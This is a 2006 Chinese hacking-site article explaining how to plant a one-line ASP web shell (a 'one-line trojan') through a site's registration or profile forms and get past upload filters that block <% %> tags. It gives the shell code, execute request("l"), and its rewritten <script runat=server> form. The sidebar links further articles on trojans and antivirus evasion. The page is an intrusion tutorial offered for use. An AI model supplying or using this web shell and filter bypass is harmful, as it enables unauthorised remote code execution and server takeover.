黑客风云——风云网络
设为首页
加入收藏
我要投稿
网站地图
黑客新闻
黑客技术
动画教程
QQ黑客
培训基地
技术论坛
您现在的位置:
黑客风云
>>
黑客文章
>>
黑客进阶
>>
木马天地
>> 文章正文
[推荐]
一句话木马中突破〈%%〉标记过滤
荐
★★★★★
一句话木马中突破〈%%〉标记过滤
文章整理发布:
黑客风云
文章来源:
www.05112.com
更新时间:2006-10-29
很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。
使
网站
ASP数据库变成为一个ASP
木马
,然后进一步
入侵
控制服务器。
不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。
这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP
木马
为例。
首先:原程序代码是“〈%execute request("l")%〉", 我们可以把它的标签换下来。
然后改成"〈scriptlanguage=VBScript runat=server〉execute request("l")〈/Script〉".。
这样就避开了使用〈%%〉,保存为.ASP,程序照样执行,效果是一样的。
文章录入:cainiaowang 责任编辑:cainiaowang
上一篇文章:
后门木马DllShell v1.3的使用详解
下一篇文章:
Eval版ASP木马原理解析
【字体:
小
大
】【
发表评论
】【
加入收藏
】【
告诉好友
】【
打印此文
】【
关闭窗口
】
VIP 专 区
抽根憋闷烟的心声
学习网页制作的理由
加入终身会员的理由!!!
学习黑客编程的5大理由
学习免杀的6大理由
学习软件破解的理由
会员账号开通查询
常见问题解答
汇款向导
学员报名咨询
最 新 热 门
2007年IE 0day 网马
04-02
修改特征码打造免杀后门之灰鸽子
04-02
挂马代码大全
03-22
打造不死的asp木马
03-21
木马免杀原理详解
01-31
新编MS07004网页木马源码
01-27
灰鸽子VIP2006服务端过各种杀毒软
01-26
木马免杀之加壳与改入口点法
01-23
灰鸽子超级详细教程(看了就会)
01-16
灰鸽子远程管理软件新手技术手册
12-27
二个非常规ASP木马
12-13
木马免杀浓缩精华版教程不看后悔
12-05
相 关 文 章
突破单位网管封杀QQ、MSN 端口的方法
JSP一句话木马
突破SQL错误提示成功上传webshell
突破一流信息监控系统等IIS防火墙实现注
DB_ONER权限日志备份专用一句话木马
突破网关,利用端口重定向进入内网
突破IceSword自身的进程保护
突破SQL错误提示上传webshell
NTFS下做一次幽灵(突破读写权限)
突破WINDOWS XP2 的IIS并发数
过滤wm_char,和wm_ime_char消息,得到键
一句话木马中突破〈%%〉标记过滤
Copyright @2006 黑客风云 ●业务联系:QQ
联系怪人
联系奇人
Email:
给怪人发邮件
给奇人发邮件
ICP备案:冀06009886
站长统计..